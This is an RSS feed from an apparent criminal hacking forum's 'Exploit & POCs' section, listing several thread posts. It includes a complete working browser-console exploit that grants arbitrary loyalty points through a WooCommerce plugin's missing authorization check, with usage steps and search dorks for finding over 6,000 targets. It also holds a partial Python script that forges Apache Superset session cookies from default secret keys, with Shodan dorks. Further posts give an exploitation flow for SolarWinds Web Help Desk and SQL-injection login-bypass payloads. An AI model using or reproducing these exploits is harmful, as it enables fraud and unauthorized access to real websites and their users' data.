<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[RaidForums - Exploit & POCs]]></title>
		<link>https://raidforums.hn/</link>
		<description><![CDATA[RaidForums - https://raidforums.hn]]></description>
		<pubDate>Fri, 05 Jun 2026 19:46:11 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC]]></title>
			<link>https://raidforums.hn/Thread-CVE-2025-40554-SolarWinds-Web-Help-Desk-Auth-Bypass-RCE-PoC</link>
			<pubDate>Fri, 06 Feb 2026 18:13:16 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=284601">miyako</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-CVE-2025-40554-SolarWinds-Web-Help-Desk-Auth-Bypass-RCE-PoC</guid>
			<description><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
<br />
<br />
A comprehensive security testing tool for detecting and exploiting the authentication bypass vulnerability (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">CVE-2025-40554</span> is a critical authentication bypass vulnerability in SolarWinds Web Help Desk that allows unauthenticated attackers to:<ul class="mycode_list"><li>Bypass authentication mechanisms<br />
</li>
<li>Access privileged administrative functions (Authentication)<br />
</li>
<li>Enumerate system configuration<br />
</li>
</ul>
<br />
Exploitation Flow:<br />
<ol type="1" class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Session Establishment</span><ul class="mycode_list"><li>Connects to WHD instance<br />
</li>
<li>Extracts WOSID (WebObjects Session ID) from multiple sources<br />
</li>
<li>Captures XSRF token if present<br />
</li>
</ul>
</li>
<li><span style="font-weight: bold;" class="mycode_b">Authentication Bypass</span><ul class="mycode_list"><li>Crafts malicious URL with WOSID injection<br />
</li>
<li>Exploits path traversal in WebObjects routing<br />
</li>
<li>Bypasses authentication checks<br />
</li>
</ul>
</li>
<li><span style="font-weight: bold;" class="mycode_b">Credential Testing</span> (optional)<ul class="mycode_list"><li>Parses login form with CSRF protection<br />
</li>
<li>Tests default credentials (client/client)<br />
</li>
<li>Validates successful authentication<br />
</li>
</ul>
</li>
<li><span style="font-weight: bold;" class="mycode_b">Full Exploitation</span> (--exploit mode)<ul class="mycode_list"><li>Exports session cookies<br />
</li>
<li>access email, tickets, database, users, (removed)<br />
</li>
</ul>
</li>
</ol>
The tool detects successful bypass by checking for:<ul class="mycode_list"><li>externalAuthContainer<br />
 - External auth configuration<br />
</li>
<li>JSONRpcClient<br />
 - API client exposure<br />
</li>
<li>SAML 2.0<br />
 - SSO configuration<br />
</li>
<li>LoginPref<br />
 - Login preference settings<br />
</li>
<li>authMode<br />
 - Authentication mode settings<br />
</li>
</ul>
]]></description>
			<content:encoded><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
<br />
<br />
A comprehensive security testing tool for detecting and exploiting the authentication bypass vulnerability (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">CVE-2025-40554</span> is a critical authentication bypass vulnerability in SolarWinds Web Help Desk that allows unauthenticated attackers to:<ul class="mycode_list"><li>Bypass authentication mechanisms<br />
</li>
<li>Access privileged administrative functions (Authentication)<br />
</li>
<li>Enumerate system configuration<br />
</li>
</ul>
<br />
Exploitation Flow:<br />
<ol type="1" class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Session Establishment</span><ul class="mycode_list"><li>Connects to WHD instance<br />
</li>
<li>Extracts WOSID (WebObjects Session ID) from multiple sources<br />
</li>
<li>Captures XSRF token if present<br />
</li>
</ul>
</li>
<li><span style="font-weight: bold;" class="mycode_b">Authentication Bypass</span><ul class="mycode_list"><li>Crafts malicious URL with WOSID injection<br />
</li>
<li>Exploits path traversal in WebObjects routing<br />
</li>
<li>Bypasses authentication checks<br />
</li>
</ul>
</li>
<li><span style="font-weight: bold;" class="mycode_b">Credential Testing</span> (optional)<ul class="mycode_list"><li>Parses login form with CSRF protection<br />
</li>
<li>Tests default credentials (client/client)<br />
</li>
<li>Validates successful authentication<br />
</li>
</ul>
</li>
<li><span style="font-weight: bold;" class="mycode_b">Full Exploitation</span> (--exploit mode)<ul class="mycode_list"><li>Exports session cookies<br />
</li>
<li>access email, tickets, database, users, (removed)<br />
</li>
</ul>
</li>
</ol>
The tool detects successful bypass by checking for:<ul class="mycode_list"><li>externalAuthContainer<br />
 - External auth configuration<br />
</li>
<li>JSONRpcClient<br />
 - API client exposure<br />
</li>
<li>SAML 2.0<br />
 - SSO configuration<br />
</li>
<li>LoginPref<br />
 - Login preference settings<br />
</li>
<li>authMode<br />
 - Authentication mode settings<br />
</li>
</ul>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ban Any Discord Exploit]]></title>
			<link>https://raidforums.hn/Thread-Ban-Any-Discord-Exploit</link>
			<pubDate>Sun, 11 Jan 2026 16:13:45 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=416847">PhineasFisher</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-Ban-Any-Discord-Exploit</guid>
			<description><![CDATA[Ban any discord account.<br />
<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[Ban any discord account.<br />
<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[0Day WP Plugin Points and Rewards for WooCommerce]]></title>
			<link>https://raidforums.hn/Thread-0Day-WP-Plugin-Points-and-Rewards-for-WooCommerce</link>
			<pubDate>Fri, 09 Jan 2026 12:39:15 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=416847">PhineasFisher</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-0Day-WP-Plugin-Points-and-Rewards-for-WooCommerce</guid>
			<description><![CDATA[/*<br />
* Exploit for Points and Rewards for WooCommerce Plugin (0-Day)<br />
* Vulnerability: Privilege Escalation / Missing Authorization<br />
* Any logged-in user can grant themselves points.<br />
*<br />
* Instructions:<br />
* 1. Log in to the target WordPress site with any user account.<br />
* 2. Navigate to any page on the site.<br />
* 3. Open the browser's Developer Console (F12 or Ctrl+Shift+I).<br />
* 4. Paste the entire script below into the console and press Enter.<br />
* 5. Check your points balance in the "My Points" section.<br />
*/<br />
<br />
(function() {<br />
// --- CONFIGURATION ---<br />
// Set the amount of points you want to add.<br />
const pointsToAdd = 999999;<br />
// Set the reason for the points update. This will be logged.<br />
const pointsReason = 'Loyalty Bonus';<br />
// Set the operation type: 'add' to add points, 'subtract' to remove them, 'override' to set a specific total.<br />
const operationType = 'add';<br />
// --------------------<br />
<br />
// Check if the required nonce object is available in the page's global scope.<br />
if (typeof wps_wpr === 'undefined' || !wps_wpr.wps_wpr_nonce || !wps_wpr.ajaxurl) {<br />
console.error('Error: Required wps_wpr object (with nonce and ajaxurl) not found.');<br />
console.error('This script must be run on a page where the Points and Rewards plugin has loaded its frontend scripts.');<br />
return;<br />
}<br />
<br />
// Get the nonce and AJAX URL from the global JavaScript variable.<br />
const nonce = wps_wpr.wps_wpr_nonce;<br />
const ajaxurl = wps_wpr.ajaxurl;<br />
<br />
// Get the current logged-in user's email. This is a crucial step.<br />
// The plugin's function wps_update_points_of_users looks up the user by email.<br />
// We fetch it from the account page link, which is a common and reliable method.<br />
let userEmail = '';<br />
const accountLink = document.querySelector('a[href*="/my-account"]');<br />
if (accountLink) {<br />
// If the link text is the email, use it.<br />
if (accountLink.textContent.includes('@')) {<br />
userEmail = accountLink.textContent.trim();<br />
}<br />
}<br />
<br />
// Fallback: Try to get it from the body class or other common places.<br />
if (!userEmail) {<br />
// This is a less reliable fallback.<br />
const bodyClasses = document.body.className.split(' ');<br />
for (const cls of bodyClasses) {<br />
if (cls.includes('user-') &amp;&amp; !cls.includes('logged-in')) {<br />
// This is a guess, the primary method above is better.<br />
// We will rely on the server knowing the current user if email is not found.<br />
}<br />
}<br />
}<br />
<br />
// Prepare the data to be sent. This mimics what the admin CSV import does.<br />
const data = {<br />
action: 'wps_wpr_update_points_of_users', // The correct AJAX action to call<br />
wps_nonce: nonce, // The security nonce<br />
wps_user_email: userEmail, // The email of the user to update<br />
wps_user_points: pointsToAdd, // The number of points to add<br />
import_points_reason: pointsReason, // The reason for the update<br />
wps_wpr_export_table_option: operationType // The operation: 'add', 'subtract', or 'override'<br />
};<br />
<br />
console.log('Sending exploit request with the following data:', data);<br />
console.log(Attempting to add &#36;{pointsToAdd} points to user: &#36;{userEmail || '(current logged-in user)'});<br />
<br />
// Send the AJAX request using jQuery, which is loaded on almost all WordPress sites.<br />
jQuery.post(ajaxurl, data, function(response) {<br />
console.log('Server response:', response);<br />
if (response &amp;&amp; response.success) {<br />
alert(Success! &#36;{pointsToAdd} points have been added to your account.);<br />
console.log('Exploit successful. Points updated.');<br />
} else {<br />
alert('Exploit failed. Check the console for more details.');<br />
console.error('Exploit failed. Server returned an error or unexpected response.', response);<br />
}<br />
}).fail(function(xhr, status, error) {<br />
alert('Exploit failed. Could not connect to the server.');<br />
console.error('AJAX request failed:', status, error);<br />
console.error('Server response text:', xhr.responseText);<br />
});<br />
<br />
})();<br />
<br />
How to Use It<br />
Register and Log In: Create an account on the target WordPress site and log in.<br />
Open Developer Console: Go to any page on the site (like the homepage or the "My Points" page) and open the browser's developer tools by pressing F12 or Ctrl+Shift+I (Cmd+Opt+I on Mac). Go to the Console tab.<br />
Paste and Run: Copy the entire code block above and paste it into the console. Press Enter.<br />
Check Results: The script will immediately attempt to add the points. You will see an alert pop up on success or failure, and the console will log the detailed server response. You can then refresh the "My Points" page to see your new balance.<br />
<br />
<br />
Dork:body="/wp-content/plugins/points-and-rewards-for-woocommerce/"<br />
On FOFA: Paste this into the search bar. It will return a list of over 6,000 URLs currently running the plugin.<br />
On PublicWWW: Do the same. This is another excellent resource for finding sites with specific code or footprints.<br />
<br />
You're Welcome, please rep and enjoy.]]></description>
			<content:encoded><![CDATA[/*<br />
* Exploit for Points and Rewards for WooCommerce Plugin (0-Day)<br />
* Vulnerability: Privilege Escalation / Missing Authorization<br />
* Any logged-in user can grant themselves points.<br />
*<br />
* Instructions:<br />
* 1. Log in to the target WordPress site with any user account.<br />
* 2. Navigate to any page on the site.<br />
* 3. Open the browser's Developer Console (F12 or Ctrl+Shift+I).<br />
* 4. Paste the entire script below into the console and press Enter.<br />
* 5. Check your points balance in the "My Points" section.<br />
*/<br />
<br />
(function() {<br />
// --- CONFIGURATION ---<br />
// Set the amount of points you want to add.<br />
const pointsToAdd = 999999;<br />
// Set the reason for the points update. This will be logged.<br />
const pointsReason = 'Loyalty Bonus';<br />
// Set the operation type: 'add' to add points, 'subtract' to remove them, 'override' to set a specific total.<br />
const operationType = 'add';<br />
// --------------------<br />
<br />
// Check if the required nonce object is available in the page's global scope.<br />
if (typeof wps_wpr === 'undefined' || !wps_wpr.wps_wpr_nonce || !wps_wpr.ajaxurl) {<br />
console.error('Error: Required wps_wpr object (with nonce and ajaxurl) not found.');<br />
console.error('This script must be run on a page where the Points and Rewards plugin has loaded its frontend scripts.');<br />
return;<br />
}<br />
<br />
// Get the nonce and AJAX URL from the global JavaScript variable.<br />
const nonce = wps_wpr.wps_wpr_nonce;<br />
const ajaxurl = wps_wpr.ajaxurl;<br />
<br />
// Get the current logged-in user's email. This is a crucial step.<br />
// The plugin's function wps_update_points_of_users looks up the user by email.<br />
// We fetch it from the account page link, which is a common and reliable method.<br />
let userEmail = '';<br />
const accountLink = document.querySelector('a[href*="/my-account"]');<br />
if (accountLink) {<br />
// If the link text is the email, use it.<br />
if (accountLink.textContent.includes('@')) {<br />
userEmail = accountLink.textContent.trim();<br />
}<br />
}<br />
<br />
// Fallback: Try to get it from the body class or other common places.<br />
if (!userEmail) {<br />
// This is a less reliable fallback.<br />
const bodyClasses = document.body.className.split(' ');<br />
for (const cls of bodyClasses) {<br />
if (cls.includes('user-') &amp;&amp; !cls.includes('logged-in')) {<br />
// This is a guess, the primary method above is better.<br />
// We will rely on the server knowing the current user if email is not found.<br />
}<br />
}<br />
}<br />
<br />
// Prepare the data to be sent. This mimics what the admin CSV import does.<br />
const data = {<br />
action: 'wps_wpr_update_points_of_users', // The correct AJAX action to call<br />
wps_nonce: nonce, // The security nonce<br />
wps_user_email: userEmail, // The email of the user to update<br />
wps_user_points: pointsToAdd, // The number of points to add<br />
import_points_reason: pointsReason, // The reason for the update<br />
wps_wpr_export_table_option: operationType // The operation: 'add', 'subtract', or 'override'<br />
};<br />
<br />
console.log('Sending exploit request with the following data:', data);<br />
console.log(Attempting to add &#36;{pointsToAdd} points to user: &#36;{userEmail || '(current logged-in user)'});<br />
<br />
// Send the AJAX request using jQuery, which is loaded on almost all WordPress sites.<br />
jQuery.post(ajaxurl, data, function(response) {<br />
console.log('Server response:', response);<br />
if (response &amp;&amp; response.success) {<br />
alert(Success! &#36;{pointsToAdd} points have been added to your account.);<br />
console.log('Exploit successful. Points updated.');<br />
} else {<br />
alert('Exploit failed. Check the console for more details.');<br />
console.error('Exploit failed. Server returned an error or unexpected response.', response);<br />
}<br />
}).fail(function(xhr, status, error) {<br />
alert('Exploit failed. Could not connect to the server.');<br />
console.error('AJAX request failed:', status, error);<br />
console.error('Server response text:', xhr.responseText);<br />
});<br />
<br />
})();<br />
<br />
How to Use It<br />
Register and Log In: Create an account on the target WordPress site and log in.<br />
Open Developer Console: Go to any page on the site (like the homepage or the "My Points" page) and open the browser's developer tools by pressing F12 or Ctrl+Shift+I (Cmd+Opt+I on Mac). Go to the Console tab.<br />
Paste and Run: Copy the entire code block above and paste it into the console. Press Enter.<br />
Check Results: The script will immediately attempt to add the points. You will see an alert pop up on success or failure, and the console will log the detailed server response. You can then refresh the "My Points" page to see your new balance.<br />
<br />
<br />
Dork:body="/wp-content/plugins/points-and-rewards-for-woocommerce/"<br />
On FOFA: Paste this into the search bar. It will return a list of over 6,000 URLs currently running the plugin.<br />
On PublicWWW: Do the same. This is another excellent resource for finding sites with specific code or footprints.<br />
<br />
You're Welcome, please rep and enjoy.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[SQL Injection Basic to Expert]]></title>
			<link>https://raidforums.hn/Thread-SQL-Injection-Basic-to-Expert</link>
			<pubDate>Wed, 07 Jan 2026 10:20:13 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=28899">Nerius</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-SQL-Injection-Basic-to-Expert</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">What is SQL Injection?</span><br />
<br />
Imagine a website has a login form or a search box that talks to a database in the background. The site takes what you type and plugs it straight into a database command without checking it properly.<br />
A hacker can type special code into that box, tricking the database into doing something unexpected—like showing private data, letting them log in without a password, or even deleting stuff.<br />
It's like telling a robot, "Give me the info for user Bob," but sneaking in extra instructions like "...and also show me everyone's passwords."<br />
This happens because the website doesn't clean or separate user input from the actual command.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">A Basic Example</span><br />
Suppose a website checks login like this behind the scenes:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>"SELECT * FROM users WHERE username = 'what you typed' AND password = 'what you typed'"</code></div></div>If you type a normal username like "john" and password "secret", it works fine.<br />
<br />
But if a hacker types this in the username field:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>john' OR '1'='1</code></div></div><br />
The command becomes:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>SELECT * FROM users WHERE username = 'john' OR '1'='1' AND password = '...'</code></div></div><br />
Since<span style="font-weight: bold;" class="mycode_b"> <span style="font-style: italic;" class="mycode_i">'1'='1'</span></span><span style="font-style: italic;" class="mycode_i">  </span>is always true, it logs in as the first user (often admin) without needing the right password.<br />
That's a classic way to bypass login.<br />
Another simple one: Typing a single quote ' into a field. If the site shows an error about <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">"SQL syntax,"</span></span> it means it's vulnerable.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Common Tools Used for Testing </span><br />
Security testers use these to automate finding and checking vulnerabilities:<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">sqlmap</span> — Free and powerful open-source tool. It automatically detects and exploits SQLi. You point it at a URL or request, and it does the heavy lifting (like dumping databases). Great for beginners learning on test apps.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Burp Suite</span> — A pro tool for intercepting web traffic. You capture requests, send them to sqlmap, or test manually. The free version is good to start with.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">OWASP ZAP</span> — Free alternative to Burp, scans for vulnerabilities including SQLi.<br />
</li>
</ul>
]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">What is SQL Injection?</span><br />
<br />
Imagine a website has a login form or a search box that talks to a database in the background. The site takes what you type and plugs it straight into a database command without checking it properly.<br />
A hacker can type special code into that box, tricking the database into doing something unexpected—like showing private data, letting them log in without a password, or even deleting stuff.<br />
It's like telling a robot, "Give me the info for user Bob," but sneaking in extra instructions like "...and also show me everyone's passwords."<br />
This happens because the website doesn't clean or separate user input from the actual command.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">A Basic Example</span><br />
Suppose a website checks login like this behind the scenes:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>"SELECT * FROM users WHERE username = 'what you typed' AND password = 'what you typed'"</code></div></div>If you type a normal username like "john" and password "secret", it works fine.<br />
<br />
But if a hacker types this in the username field:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>john' OR '1'='1</code></div></div><br />
The command becomes:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>SELECT * FROM users WHERE username = 'john' OR '1'='1' AND password = '...'</code></div></div><br />
Since<span style="font-weight: bold;" class="mycode_b"> <span style="font-style: italic;" class="mycode_i">'1'='1'</span></span><span style="font-style: italic;" class="mycode_i">  </span>is always true, it logs in as the first user (often admin) without needing the right password.<br />
That's a classic way to bypass login.<br />
Another simple one: Typing a single quote ' into a field. If the site shows an error about <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">"SQL syntax,"</span></span> it means it's vulnerable.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Common Tools Used for Testing </span><br />
Security testers use these to automate finding and checking vulnerabilities:<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">sqlmap</span> — Free and powerful open-source tool. It automatically detects and exploits SQLi. You point it at a URL or request, and it does the heavy lifting (like dumping databases). Great for beginners learning on test apps.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Burp Suite</span> — A pro tool for intercepting web traffic. You capture requests, send them to sqlmap, or test manually. The free version is good to start with.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">OWASP ZAP</span> — Free alternative to Burp, scans for vulnerabilities including SQLi.<br />
</li>
</ul>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HPE OneView RCE Exploit [CVE-2025-37164]]]></title>
			<link>https://raidforums.hn/Thread-HPE-OneView-RCE-Exploit-CVE-2025-37164</link>
			<pubDate>Sat, 20 Dec 2025 11:34:48 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=68991">Hawx01</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-HPE-OneView-RCE-Exploit-CVE-2025-37164</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Vulnerability Details:</span><ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">CVE ID:</span> CVE-2025-37164 <br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Type: </span>RCE<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">CVSS Score:</span> 10.0<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Severity:</span> Critical <br />
</li>
</ul>
<hr class="mycode_hr" />
<span style="font-weight: bold;" class="mycode_b">Exploit Details:</span><ul class="mycode_list"><li>Nuclei Scanner Template<br />
</li>
</ul>
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<hr class="mycode_hr" /><ul class="mycode_list"><li>Python Exploit<br />
</li>
</ul>
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Vulnerability Details:</span><ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">CVE ID:</span> CVE-2025-37164 <br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Type: </span>RCE<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">CVSS Score:</span> 10.0<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Severity:</span> Critical <br />
</li>
</ul>
<hr class="mycode_hr" />
<span style="font-weight: bold;" class="mycode_b">Exploit Details:</span><ul class="mycode_list"><li>Nuclei Scanner Template<br />
</li>
</ul>
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<hr class="mycode_hr" /><ul class="mycode_list"><li>Python Exploit<br />
</li>
</ul>
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Apache Superset Authentication Bypass]]></title>
			<link>https://raidforums.hn/Thread-Apache-Superset-Authentication-Bypass</link>
			<pubDate>Sat, 02 Aug 2025 00:50:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=45755">metadata</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-Apache-Superset-Authentication-Bypass</guid>
			<description><![CDATA[An authentication bypass vulnerability exists due to the use of a default or hardcoded secret key in the application’s configuration. Secret keys are typically used for signing session cookies, JWT tokens, or other authentication mechanisms. If the default key is predictable (e.g., defaultsecret, changeme, or any framework-provided default), an attacker can craft valid authentication tokens or session cookies, effectively bypassing login requirements and gaining unauthorized access to protected areas of the application<br />
<br />
Dork<br />
<div class="codeblock"><div class="body" dir="ltr"><code>Google: intext: "Welcome to Apache Superset"<br />
Shodan: product:"Apache Superset"</code></div></div><br />
Python Code<br />
<div class="codeblock"><div class="body" dir="ltr"><code>from flask_unsign import session<br />
import requests<br />
import urllib3<br />
import argparse<br />
import re<br />
from time import sleep<br />
from selenium import webdriver<br />
from urllib.parse import urlparse<br />
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br />
<br />
<br />
SECRET_KEYS = [<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'&#92;x02&#92;x01thisismyscretkey&#92;x01&#92;x02&#92;&#92;e&#92;&#92;y&#92;&#92;y&#92;&#92;h',&nbsp;&nbsp;# version &lt; 1.4.1<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# version &gt;= 1.4.1<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'thisISaSECRET_1234',&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# deployment template<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# documentation<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'TEST_NON_DEV_SECRET'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# docker compose<br />
]<br />
<br />
def main():<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;parser = argparse.ArgumentParser()<br />
&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)<br />
&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')<br />
&nbsp;&nbsp;&nbsp;&nbsp;args = parser.parse_args()<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;u = args.url.rstrip('/') + '/login/'<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;headers = {<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if resp.status_code != 200:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Error retrieving login page at {u}, status code: {resp.status_code}')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;session_cookie = None<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for c in resp.cookies:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if c.name == 'session':<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;session_cookie = c.value<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if not session_cookie:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print('Error: No session cookie found')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Got session cookie: {session_cookie}')<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;decoded = session.decode(session_cookie)<br />
